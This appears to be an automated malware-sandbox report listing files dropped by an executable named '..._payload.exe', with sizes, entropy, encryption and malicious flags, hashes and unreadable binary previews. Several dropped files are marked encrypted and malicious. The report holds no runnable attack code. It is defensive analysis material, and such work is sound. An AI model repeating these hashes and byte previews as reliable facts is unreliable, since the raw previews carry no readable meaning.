                                                                                                Preview:[{"SyQ..r.........<AA!..]rK3p6.#.s.W.....O-...W.%.....E...5...]....m....\..<..!V*)F..........rO:..b.N5...h......9X...5.8......,3w]....m.6H.;5"....=..Xs.ZZ.m....=Hl..b.>. Y...*'.F.._es'...yc."....)18..9}w..tS.....U...:W..g...E.E..2A(.j{`G.uT.G*. /X^Y....%..R.S..K......?....:..|y..(R..'.N.>....B.H...!=.5....<.<....uN...4.../..........WtGx..p.....w.......]\.;.0Q3.(.`=.M....#3.....TO#P!...W..E?.........NQ....P[..8..@P.C.F.....wU....[KZ...~.].....;..<{.....PW..3B..x..=.k...}c.a}..-|M(.8...t';.....#E.y.09....pYM..[.u.[\....d..d..V......S/p/3..F.....\D..A...`..-..$.rd.).{...ZvD..C#.=....#.v.v.CH.]..wZ....Z.Ty95....9..bJ..Q..^...1.%~...L....E..'..I.... $.[.~..*N.."..#..Y....m-.....KD;......pJ.A^..I!.......Y6../.......~.F.&$64".....4....a..0P;0.S.i.A[.z.....<[.......(*.{.(...}.?...ar...5_.G..U.)......m..m........."<.......K.......X......u.F.....]..kW...V.Y.DQV....H|.|_.....wr7.E........HbDg..!mx.."..9._..v|..:R.o.j5.Spu. ..R...p}.YD>5.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):117246
                                                                                                Entropy (8bit):7.998365370975708
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:06yjp9MsTN1+C0gNtMXnND/cOR73G7mh5K8hTfzxAnkx:06y3Fg3n70+hTFR
                                                                                                MD5:B83B37F81FF32FC1DD17CF44AA11005A
                                                                                                SHA1:E346AFF96A559AD167D8C64C4CDD476DB6326F0A
                                                                                                SHA-256:A7D78C780AE2B516A4A7EDF64F0F831DA625BB01F420241F76A9D3926FA31711
                                                                                                SHA-512:B6311665DCF443B63DA330C9F16C487CB796653C8520F17FC6F687FF87A20D707109259ECD1EF86C258C0A5E911740604939A79B9CB5AB922959F7AA4C6381B1
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy.....o.le...zw..6..6.a....I~.K1.9Wu.?M..0...!../1jY....".E......<.qx..Fp.?....2..&..i...-...pKY.S.y...jM...(.:.";.....4.=sx...58>VN..!Im..-......K.e..2...{..2...L....p....h..?.,.g.5.sX.j......)OG..}..*...q...X..<......\f.e......}u.....K.r..f....n...+....8w.....$Vj5V..O&.2....H&...2........H`......}......j......A....O.q....j.>S%....Fw.z.h...j.T...... . ..y....?`;..G..{p....IW.wc]{...Y.O^..w...|L?....F"..3.0.~......+.g..K....8Xs.q.E^I.b..n.v.|j.....KB.F..u...Ze.....'j.L..1.3...$...Ut.....,...;.%.....S..d%..;3.o.R...q....Jd .Hr.#...o.}...o.........Tc....Z.e8*.UW...O...u L..m*...px...!...Yh:+..K,wg.Ve..1.Q...#.~.L...<..Ns.3...c3...X...4.}Vc.ajG.n.WB...=..^...:..k..D..........=.+.6m.qW...d.r.y/4./..\.n........p%...E.0"N...z......7.u....F.~c}M.M...H..s.../..=N...o,.S">....bA[...^U...$.*..../n..4.%U..QAg..u].....f7C.T..l.+.%.5..|_[b.z.E..f".a.[....X.s.r.....[....X....EP.~D..B1.....D.........<.>\q..'..N.r......V.....u3.8D.5....9/
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):116817
                                                                                                Entropy (8bit):7.998432434547465
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:GzJp212sIZzW4EPxzAtBush3j3vB3g1NdMTS4dT6EnoD:Gu125zEZzAS8hKx4R6AoD
                                                                                                MD5:AFF4271666521A2DF55C9BA619AFECA7
                                                                                                SHA1:44B91F9DBBCB5A1CBB494FA8D02F3E2A246D0BC8
                                                                                                SHA-256:5F033051BD93A7F2E98D95FACB287B1DBBBEF5687E5E3F7A9A2FC01809AD6A95
                                                                                                SHA-512:455E225D9B2141471F2E76CEA0A279724AB6760E4055372DE1BD17B8D589419C5385FA0B75C429AC1D13E57568AF4BC05CA68B5CAF9759B3629AC36F6A774D1B
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy..M.....[..6R..n....#'%..i..&..(.y.1.>..=Y..FI.5(u..........-.-........n.J..8c4....(z.Le.*G.fw|U.9..z...}.1K...3.z7q......`.....l..A.u....i.0!..Q5...$..2..=G.....)....6k=.;1z...p79~.*.#.[T<...18.......F=..j'..0...1.......[.o_....\..".hS. ..hw8j.r....R....=&..".1.eW*/{.U...sg....x)...DqQ;\...*rg41.......].....1....r..3|.l.)..Z.zW.(.o......U.Ep].3%.._A.40h.c&....4.........uA+}...F..Q....SL...S..f..(.s..g......{z.2.4..D..<....NF.y...WR...mD.....@g.t...xq7..Il...=..n...E."...6....zV..$;{:i5.h;..'....`$.t^....2.1...).......E.........l.....s.d\Jp..m5....(eb.i../.f....K.|.U#..Ex.w....X\E.{...5..5,Q...@<....h..I.F.<..:W.c.r.65.r......_.....P..n...H......+..E...<.+?..J.c`....^.J.{>6.............R.....).M.......84r".^.B...mU2:....%c.......c.*?.rF.....K..K.?..r.O..-4..~... .|T,I....#..I.\.AXkD."..H.M...~.L.h<....T..r.....[.....8...]...5......[%...u.....>b...%.O..\'...:.Ib..u..B.f)Fx..._...K.q..5MfX.8.../|.|..J>..K...;.m:...|.K.r...F#..'
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):115275
                                                                                                Entropy (8bit):7.998352093467609
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:u9qBnO8KtLa+ULC7K0GXg7ls/ZqO/yR1XJs9LM3:QCOrQulGQ7SoF1XK9Y3
                                                                                                MD5:F6F60A8B4220C8A828127A746F58B770
                                                                                                SHA1:BDFEDF3A622C4E769F910F4E2A06B67B30FC3A69
                                                                                                SHA-256:6F88226DE844A8747263C38F462F789EED22D9F76F4CFC2B36848AA485637460
                                                                                                SHA-512:F54E631E67E0D0C43E444EEB4BACD4E2A492D9F1B4358C72A387C4A22503F0AAF442FE8C13B6D78765169A72149D487A61C91940CDE3981DFC719CEBA4A80243
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy\<\[...Bqz._.........@....L...Et...G..@G...9...W............8f.D...aYwG0...md....+.....pxHO+=..7QY.,.......x1.(..N..#..]u.._....a..>.....\UFNk........+.q%.d.e....~.>E.beu..3G.....@...R.{.`l..P..Nkc%Y.K....F.0.............yi%..*..$...7.c+.vT..`[..I..\[..(.F....."..4.P]bS..y...9...xo..l..D..'hC..J..m.Y.2L"...!Z..4...z0..b..`.g.;W....B.Gqqbf...~..$."....]y.....r.7.... m6...,."A..]..C.....5#..A`.i..............uE..D..HR..O..e. .&.8A....B.......C.n...^.._..H.K...E..v.V..%}..3.4..P..VU2...k...g...qz.((_.\[..j..u...,...T....N.9..F=...}.eTb.......1K....(.v......C......L.......h.."ZE.........h...iS..T...[|..@.P`w...&.:O:.(.m...8gI...4.....3..+.f{.VJ.V.GZe...K.5...."q[.Y.3...Y3t+v_I...@...-...z.O.@..P..Q.h.~.?.7.Jua"I.l.9;.~f..T.....C..u.'...'....~L.._Lv.) ..|.EB...kU.8IK...._N.Q.r.[5.!.Tn....I..3..:..O,.....f..+..O..../+.-.... ..........jR.......0.I$kHK..R..3....7.\..#.F.f...J........."..1.F.>...L..E~#.L^.R.......5y.m.t.......2.!l..]
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):115275
                                                                                                Entropy (8bit):7.99841826972603
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:zYbLNiXmkp+N77mHR4qcgG/e/pBSUoYQHs:z0LNiXfpA7hqXce/Dth3
                                                                                                MD5:93EFAC32AEBEEE1089EB78A352C4FB97
                                                                                                SHA1:A7D38281FF02E1ABBD76CA0A6AA4E0874B13ABCF
                                                                                                SHA-256:738420FC562B273266A2DBFDBC68B928740B931E21A06110139051CCAE6DDA4A
                                                                                                SHA-512:14C2BC5A80270B8A5095972C5E8ACFC54AA3749041E894C273BC7AC96357FE097146BDAC3D4B78092F5B526B745EE011B8AE2F4C9C1BC9E590F74816F3609EF8
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy.\?.E././...}+L..).y.kX..".4e,...v.vr"tg.D...o.W...2U....Gy.9.R......$NO...-~..k.....u.....;....z%v..G..f.v.....V(...M.$.;4wW.I2.C~.RJ.....~....%[...f..AI.)v..;y...J/..zzw..c......G...#..Pi.k.7..^....?...6.....H..!).,]....%~........K...3..\..y........).r.E.=oM....S.Zg..l5>..%/u.X.z7/.5....0-/..?"...G...4.......[......9 (+.s.o!5...:.]7xu=.\.uY..z../L.$.....v-u......L..qC.."#qC.\..p.q....>....E..L.K.nO..m...T.7._w..ez..?u..}..S...w..r.=.yL.$.Q..=...F..>.}J*...5zl..v.d..a......e:n%.Go......r......v...J...b.TF.X.d6..c.x...S...;./...l.Q6...U..Ns...aZ.%@.jP...b.c..b_.......]b........f...7...W.x,.3.o0.u..r..........@D.':....<f.^6.d,S:<.R..=|y..t.R.;....C...I..x....4..F.....S..r...P-kvf}\...}...Y.].GuB.k._V.h.R.C.Kn.O..o.I.(..S_Iv.UuZ.RQ..pG...y.[I...$.......Oe....U-.`.....s..Y.......8...^..6.....4.q [.........t'G.....w..7.....k*..e.B....0Y..A.L@1y^`.$xtV#....#.2B...r...XD<....W...5..G....|.<.(%.v(.1.(9/..+=..J......r.lR...u.x.e..dZ.3.M.,
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):696930
                                                                                                Entropy (8bit):6.208506947787719
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:KJm1j8SVCt/Jk/xoGotdYuMOCc5MpzgroTDLgN:K7SVCt/2x1uMOCc5MpzgroTDLU
                                                                                                MD5:67C73C31546C0762D65FE3D50BC818E5
                                                                                                SHA1:076FF3E64FD6D2D7A0572C3602B84818391A6405
                                                                                                SHA-256:E9B4A2D1AAE11AA88E037DAEFD226CEF66FDFCDBD2C280E19A957F1114E8E6E7
                                                                                                SHA-512:C9B5B312662D98D3FE1B936FAA71B35BF1A2287231F5D3A0A7313BF7253F0771CF6C182E9B81992D3757F425AC8D7383E6D9F0314243A78AE2DC82121C9BD1A6
                                                                                                Malicious:true
                                                                                                Preview:[{"Sy.N..^.k.!..'..@uI...o.V.b..6a.Q..1.v>..&\El.xwz..".J..:..B.....4.;.'.s......PB..|^Y.../.;...uw...o..# l...r,.n...-e9M.O...J....O.}.<..j.Bj].$..p.M...h1.w0..H..y..d.e..1..Q.w..P.....k....8.\^.".......1.,.S6.jv..c.MY9..>..M..6N...%.s...)...)...........}...?.]...`...+y.c@..|W>...]....|`^......^.Lm..^.`o....r.V..P.q.q....@..m..S2....nv.......^@...>..3_...s..>.|..@.T$....R..s..T.N.k/.S...C.bA...:..Q.,.B.v.... ...j......'..8p....(P.../~......^w.bV.G.'.4.q..'|..J...w...%!.2w.}..T.w-.E....W.6...+..v.UF..5..).C.Vf[..%.u.i...N.r.3....j .U.. >3..&y..?4I.!p.).1......!Z...f....g.^ PUV.mw..e..%c.zls^..L.......3.F....D._..+..w._.$..OG!..Is.{.v....A.@..P._.L..{.2:#?.... .......5...'6...L.......OY.r..Y.....7".y<9.i%m.!y.'-...CQ.]....K.x.S..V.M.......D.`.d..KkZ..~..-U^..*..I.G......M....I..........y.yw.*F,{.5<..8...\|...K..i....)t.j.*.=w<}.|;.s,...?.e.Y..@...y......!..w?..'.{.2..v.!.s.q..w...W...].KT..2Q.$KH.+....LV.Mz.V4.3.2..G.{...).?.....%.U^:>..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                Category:dropped
                                                                                                Size (bytes):7458
                                                                                                Entropy (8bit):7.977848712798314
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:RfIOCMUFbUjJkSsmUXdCWRI3PIgp+V65fdlQAG7DS2EroJu:RfBnUJdXlRGPli65X48roE
                                                                                                MD5:C904D33AA1DDCAFFF3D0BD0631986C88
                                                                                                SHA1:5C2B1CD09575844861E38057B9C73D1EB126CB1A
                                                                                                SHA-256:3BBCA3BED36B5052A7591691C3EA6763BA1A97DF0B4543110A16710163FC7F5C
                                                                                                SHA-512:55E8043EAE31FEF406A4F55CC76A268D8570BE7F34BD18FC3581CEF9A4AEB3D15DF88F45E867C1240224C270DBD47D7B3D70BCDF6256F7A76221503615975C39
                                                                                                Malicious:false
                                                                                                Preview:<svg .4.....5_..+.6&q.*....c..x.loZ..D......`U.Pr.\.4.........Z.u....sjH.@E.....G.C.#...l).R.c&qA..{/al.......]8.....Y;O..?..5.?H.........&....].t|....9.4U.?.l[.X.l.."......./.m......J..By.....5...Z..?5....}..e3..(.3g....o.E.A.F..c.y..vh...9|n.E..t.P.7.k......,q}.3t.8..(\.RL.~...o %C.^Z.....)Z....ad.7l8.8.ec..cn#J*.l.....s...}.n.s..Q.HG....?.t3.b:..:...:.A.H...{.W..5v...H..........aN`. .1.S...k.%,.*..H.L..s.AD\...\.rC.:.>.;.........`K.H*.7.[.!.'.(...[.o=....[0.9.,>.:3B;= M.\.....x../th..._.&..{#.J.....u...?..pAn?.X.*`..{%m$..V......"J.t.1*...p.../.....,K.4W'.n..?...c.@....eq......sG30/..Ep.a.h.Q..d.G.S...... d.....~...(....D.'...G...P.....ydM...)...iI..+..>....)#..+..[.K..........-z%..jn...G...t.[.po'...4..Qx..2r...G....[...}..N...SuEE....2......@..P...w..0.....Q.q.F.u.q.N.X.O.S..lo_.....O...2Lg.6.Z&.E.....^N.}..bQP..m..(..\#..b2.-9.U.T\5.V.:.Bz..%.i.y..1../.".B...>....\......?..*...g..\..G.c...|...(....Eid.*X...b..H......j
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                Category:dropped
                                                                                                Size (bytes):6854
                                                                                                Entropy (8bit):7.972794567347405
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ywsxuzuSE1btvhYDMqt7MEDmeKLk1wvNv8uT0OmVk6pYCXnmoq3e7o88Ac3c3yqi:yoPE1vYldFKhu9kG1Xmoq3e7R8Rc3HNc
                                                                                                MD5:0A75A18D57703C6BA0B244C9279E80F9
                                                                                                SHA1:B803340E0C493A209E3603D791B97C684A393279
                                                                                                SHA-256:7630725FB612015746743BC73AD67CF21A121910D2334F44BBE15E7F6AA4856B
                                                                                                SHA-512:531C85AE2B81AA80134BC9B3235CEEC21B96D27BDD8A6E03A8ACAC2E2B2B837023E21B1266996D48A2C97E3DA7F4E40FBDB998F641B3221A7432AC8F53726789
                                                                                                Malicious:false
                                                                                                Preview:<svg G}...U.W_{.=2.F..^.*..e........,x;.........S.bbc7B....D_....A)..]..x#..+.6Zj.....{..zd.m[..5Pe3%h...~Gq....l.....d(.. 7.n....m.n,...:D]..1..... c.....w-..Q.'f...oT$*..0.....C@.T.....W[...PD......^..!T+d.....n.]j.M.,.V...G...>.)-...............m.."..at.,bp..s.U...uS..(.xt..h9.`W..@3.px.5..w.....C......#...kX...R.,D,...c...h?.XdY#. .U....."H....8-.5.Z....j@g.J...w......r.2.CL....c..a=.\1vM.?......7...>!......9.S..s+........\.P..;=x...M.!...........J.7O..&....^.U.....p....f.(...Z..l...M!T....l..8{..+...M.C_...N..t."=...9.p.?.R.....7.....\..^u.Xb.T.\..+...&.U...y?.x.^C,@A.|...+..Y.20....'JW.\8..h.$...Qr...E.w.D.';.q..p.OW.v.w f.e...*..?.&..=.c...l.!.N...k.`....T.y.;.....B....D..+%.}...#.../.)B37.N...Y.l'..u.f}.q......,?..M...s"B[.......t.Q...6|>...*...e.a.U.A......I.p....l.......- .r.%...M....m.Z..."......S>c......./N l4sH$.w...v[o...dJ....`3....` '..Q?.0.6;XEQO.E...._..,u.bv..>g.Z.C..`...x...o(.LI..Y.y/.1.....WY[.:.'s...6X..\......O.L|...."N..B....I..u
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):149024
                                                                                                Entropy (8bit):7.998765412113632
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:c43YRH1cILB5v8kEAs9hX3iQtm/clP9pNnFgru:cgIH1cvZAs7X3A/cdTD
                                                                                                MD5:E2CE64AD4B91F40BE54D2874DD669589
                                                                                                SHA1:55017D3EC57C1BC296788CEFF84DB73245BA43FC
                                                                                                SHA-256:0A2B3701E942CA4BAEB3DB83F84BE6732248D01FCBB1744BE1569FF20BE45888
                                                                                                SHA-512:08E8A1B6896609CDB7EEE3A16137E79ACEC7491B2231A8E63B2004DB6AA3FA89E388EC6CBA0DA4978965308482E5559A42731D31345F886FF2B506E8A2032F14
                                                                                                Malicious:true
                                                                                                Preview:{"loc.UA...W...|.W.V.F..MD...Q..+....}V.....u..x.v.d^.VU@XT|M.w..A43%..*.8r.....<q.x`[_..v.j=_t.j[n..x....\...S...n|...=kW.#..Vl...P@.&..R..T..A.`RR.m.@N.w.5&s...p.K/"..{*..wh.....5@r-Pb...JJq.^.D.pENew..C.f,.+S.1.]..6.U.....i..X.l...._....awTV9.....5_.....x.X....c.3..,.1(R..S.c ..C.G.2.G)X<A..].*...!.........+..y.N..{..B.H....R.......G..q.;......4..J.N(.....c....u../g.r.........~......$.....hQt..\..-5..N.I.....f.fP.....c.{:.. .=..._E`....<....vPl..O.J..x......a3...`....K...6h\.p.<.$#4H*..=..4 J.o.yS..+8..q.GQ#n..6.'Q..&`.-..[..LUm.ck/S?..h.....Q.u...-.i$..x1.K+.{z..6.<.[W!V5.R[. .P....'{..W..R.1E&.}#..Z]....,..r.Z......vQ..@.2..VQ...x......[C...ou.L...ci.E...)0nB3...d...@...&.+..D.. X....w...R....&.X2.x..u..<..=.nn1M...@.L9.."9...C..z.*zN..r.w..Qb...ca....0Q.R.....VV-....PX..U..ML...t.&...o,.:U>...c..6K.F.5.>J.W.SS...?~.M6.Q......g..p ..!..%....C.^+lwo.M.M...@%S.~..X...q...}.Hr..... .].m8..(l...'.#_..m..ea.........k.Vn......lP.<.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.976039637022696
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:EI493UUdKNug9ATTKngW1vZ60EBKa0lW4x4/:Et2tiKgWRZBEBslWq4/
                                                                                                MD5:3B9C194B3FDAA120516E10ABEF4A5590
                                                                                                SHA1:678FF68804724E1E62D9E833A5F56FE2B4145ED2
                                                                                                SHA-256:3B91E2A2FC3918B69CA50A2F77AD4BCD39CFB1D29E47BA998F1CA6F2AC7CAFA5
                                                                                                SHA-512:1DEF964FCEEF2503885C4CD768DB24190C39A0A261BBDBDEE559D04E561A3874B98406345C16D663856D314A056250A409682C7DF3407D37F96448A1D6A8B7CC
                                                                                                Malicious:false
                                                                                                Preview:regf....X.gS....}..^.2A...K...7ck...(..H}._o.......RE...=.I....(.....3.m.q.ON2..iu..I........gl.9.$.Kc....>...0N^.k..X.........R:......*.......:.y.4....2.C#..1. i...~U+...L.a. )x5.p.P.Q....g{.x....M.,.U..aI@.pGY..X`...P4.G......d+.U;.,O.[...P.....#\....T.Dm+p_.I..xN...a.....G..r...k.n.?<<.|....(...H.T.R.s....Q.U...........b..!}./...hw..f..)....USQ.,z.ROd.L.DX..fk..4..h.%....e...9./.....Rs.6..Uh...I...@.<...0..!..&..|..#Nw..s.O.S....+...R..7.2.....<..B....q....,..?"..n.n.{..j..8.]IR...c.s..k<.....>...B.$. .y...<.(wr...SV#/6M.+vnF.,.;'|i.........(.7.m...2......8=E&.Hg.a.......[<7.A....g..W.ev...D../6..-.......-Ikz...}.....0.7e0...O.j8......i5......M...>.u....q...7^.g <....3..9.6...$.L...;`.b....%....X.*f......^V.,...R..f.....k..*)...-......|]..<G....Z...&.3u.K._....v.#....Q`....._;.X...Q.......{..........K.C!.6^..&"."]e....q.9.F/...b.....7...!.5.i.>..d.pl.0u"....J.M..[.y.}\9.4*...Wy..K./.".{0 .6...]>..E-.jK.'...p<.),L..z6/."w).9..D.....B[d...D..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.979916939571183
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:CpLFz8cujnEKrmhdFcuBj1OUNpKiBynkrfxdthGtXkFeBg2S1L3HmrwaFx3Et2D4:aLFAhEYmhdFEIcno1L2XtvB/0+R/c1Z
                                                                                                MD5:E77639225A8F2334CB56671E1BE32A82
                                                                                                SHA1:D614EDCF2BEFA8F43F91EF344F102C96F48F9762
                                                                                                SHA-256:235B0540E162B39A814E2C0A4536DFD5779B571C6A6459E1F0CE0FED9D068708
                                                                                                SHA-512:4BFA71448570494CF11BFD71386459A3F9A8772B69B7A4564DFD6D49BC874CC427D1A6CAED49FCD47425A744D1E044F2E93C8E3FA56C24F3BD46B4E8B5286E54
                                                                                                Malicious:false
                                                                                                Preview:regf.6n..7@..V.............A.F|x.....Q|..l.i.m.`.8...1..j.u.->..I4 ..5Wc`.....$.-.j.j....<.}.b.f......../..........Ko...$........q...sU:.]E..C..z.?)e.|.at..~..<*.4./.V.......`..x..,8.FaZ....9.y$.:IN......9lI.3n.._O.M...[I.7...&...l}....M..A.....g.(ld2.......-.j.r.......<...#a....F..>P.../..........tK.s....v,._W..[)..he....[..c....^/DH.^.V....'N.).0..Y.....e.f.0X.!.p29.J:.LnUbe.....Nr)-.dY..7.[....>0..'.la...9I..\.N.{t@.e.:... ....f......X..s"......)I...Io.`....6...e.G.R.....u..|.].)H........x;./...>...u..2..p..._E..h.......g..~$.w.D.^..z.z."..].S......OM..[..C4..l.(..Y.{K7RV7.5S.^.....].w3.+>}....S.:..>Q..7-C.....1x....V....M..g6..+.<.Q....... .p...r.g.v:.Mha<...9h.h[..`.s..-..,..ka.f>.`.'.g..a.y*.._..A....x9..lZD7...4.-.x..a.&.5.r*AW. ..(..Hn.>.-..%...].....jN.K......ev.k...5.B...^.....F#.D....H.<./.4....7.[...$........C.D\.U4.$..e4V6...v......1...^|.?......:-..GC..*..QL.^..g..p.].w.t....sF...C..0..d;...E.1#...5....?~....rZ....q.l../*.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):615
                                                                                                Entropy (8bit):7.597483348622013
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:47Wo5X4bOp8hmljIUdnI3tqA8KsinbxxJ8MaWlBK2+8JzpqgJc3cii9a:MVqb0SidnI9ZD18FYR+kFqx3bD
                                                                                                MD5:AEEC1D683B32308AE9A20C42B2C6063A
                                                                                                SHA1:1487DB598063FC3EA132C43B9B4E57F8F24FDE62
                                                                                                SHA-256:FB51F43AF71CBC95B188718296A5F765DF0AC5548934C7D10440B5ABD7DF97B6
                                                                                                SHA-512:E400F6C7CB249D0CC838E7199B39065DB5CDC3FC06EED7F8E327C71511BAA6E2E481F8B4B366680B0E75C6E0F92C9D1FA3149DAF0AC156014486EECA0ED4C0B6
                                                                                                Malicious:false
                                                                                                Preview:[000:.Vw...o....;....F...K......N..(.!`H.U7...r..M.......`...&.....r...U....P....JI....M...'....5...J...y....5....s_.g.m..I;......._+k.D...R....{.D:.....hz.KYy...e..S.H}..,.A$.J..L.....5M.(.)A.)..<R..+ML....J.....B.c.X...U3.....ZR.g.....W......4..\..,.(z.}..z...{.%..97..T.S.By[>..aD.F%n...<j........\...P.G6G.{..*x...D...V@.'9=..pB..&b3....L*..dK.@.~..n.}..o...*..YR.^...d..6.e....@}........0UF.#..t.Oel.4..f.].<..u....BL.....aB5..c.V..fVaf..:......4.b.S'?...s.JWHh..N9..|......4...&y.j...P. ;F...U.L(BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8547662
                                                                                                Entropy (8bit):5.204993428118167
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:sHR38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOh:sHtF1qd/LKNh
                                                                                                MD5:BC95C9707307284BE9E5B6A7FF773D8B
                                                                                                SHA1:AA2B4746AADB6A4F6F9B96DD15C4BA4335CD6481
                                                                                                SHA-256:76B4F95F6C2FD1E37B5826934D6CFC4266DE55C55E7F5704C7FADA72EDCFE689
                                                                                                SHA-512:4478F7BB051C670BA48C2D05A713EA70EA6FDD2D92E6652899CC4D8BB6ABD2D1A1B40E89F16F2E4CFB19965999E6465CA5BA7495581C7B40BB2268750EA61E53
                                                                                                Malicious:false
                                                                                                Preview:Micro.....Y.....H|...t.D..{.x\........9..En8...5.u..I.>Ync ..5..vK.0.....D7..R3..5a...Ic...D.......W._z....}..E.L..`8..ud.4(..o..|..I5....N=...&|B(..y$$E..y.#....u36.. .1n4.n.......;...Cm.TZ....{Xm8O.x....._.N[..O@..0*Fe..33.}..h.. 1.T.....B..../..A...g}0Y4p(......t.....!W.gUw.h..i...CiIJP........j9z.+^..Vf.y$.+.l..jW......N2.u|(t.{Sw.>..NkG...b]3.m.....[5`<>H.6...-*......Fw...Jpc4..vs."._....k...dE.....E.`..........c.....%.v.]~o.>22v!ftR.%..frI....TG.k=...q.....b.'.K..........PRU.M.f.F.....r..^..?]...FjvU..i..?'...o#.`........!G>4..[..W...(}ceg..#.....5.J..+..<x6/.....X.......+N.%/...A.#...F.gVb...u``.....x...b0...".v._......,..'..e.{_\..jQ......M.v..cRS./.g.cA.X.+............~^...$r0..<d~..D.Y....]F.....H&l.Hot..o..;p.@.`....6..H.mT.O..V5.......R.K.?.4..ca..FF....G...!p..1;..j.S7...ex........T".."&b........ _'..f6..A3P...o..<.b.J. @.`....hW...I4@[....P................>-.G6.r............|.i..QHq.Ej>.}w....K....7.8.>`O...*..o.n[.T.GC.@.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):8547662
                                                                                                Entropy (8bit):5.204918903090952
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:lE8C38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOk:280F1qd/LKNk
                                                                                                MD5:03EB5C0A123F7570E0B1B345DF71AA31
                                                                                                SHA1:9E859FB39ED1C5BEDE95CEA4C80381358548B357
                                                                                                SHA-256:66797E837DC4F67067889BA81600B28935224E34C5F952FBA0772B083688277F
                                                                                                SHA-512:42824B32A7BD231868FF8DB5B48D52D5425C4322FD46D595960467DFF95BF6E0F566BE962316CEA3C378C72F399FC478252161683EE6D23D056C4D803CCB5B92
                                                                                                Malicious:false
                                                                                                Preview:Micro.]h.E.9z...B.......X.A^P8H.4d..a.q~....Dsp%1...p2...A.Vmdl..|+..<B`<K+y..D../...l......=.B/.g9......e-..j,.ZI..!......."q.9..2...A.8...=..7...1.Q..q9;.u&.../....2.X]..4hW.V..i.....M.W..q.._.U...Bo...m. ..G/2.>...W.eE.TP..|..U.3@M......M[..R....t...H.~...G....i...i....P......}|..;p,6-...%....Sv..........x.U.P......v#...6..(n. x..|.....rRP...$.5..,...dSX.v*>.r...Ko. 5\>.n..,H.......EJ....n..J.5x..84..U%.XE.d.9...m.C....1..Fk.eM:..;.1.c.......B4.r..'q..$.v.e.i..p>....Q.KE}.EF6.#...q.C.#9.......d#...m,..........US..q....h.j...3...=........J+........>.5.b6.9d5,.9V......"(...M...._.j......S........7.O2...y.............h.e#V'..YC&.n..LU.V.le.lF...+..T...qi'(.'........T.Ql_@..P......j.>.Q..1....p*......f...I..\......*eZ..f]...Z..?........;.X..MU..M...9W%..r.f.$....1\3...z.&@.za.s.T..U9..?..~li%.S.@..x..........U.r._..\fH..7-...y.g'..r..}8b9H..n...r..N_?."!..L^.4..z.Z.f..p..&.BpV..f....F_..T...|/=..;...@..`.2..0..C../.....g.Z.B.......V.(...p.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1192270
                                                                                                Entropy (8bit):5.662975592056121
                                                                                                Encrypted:false
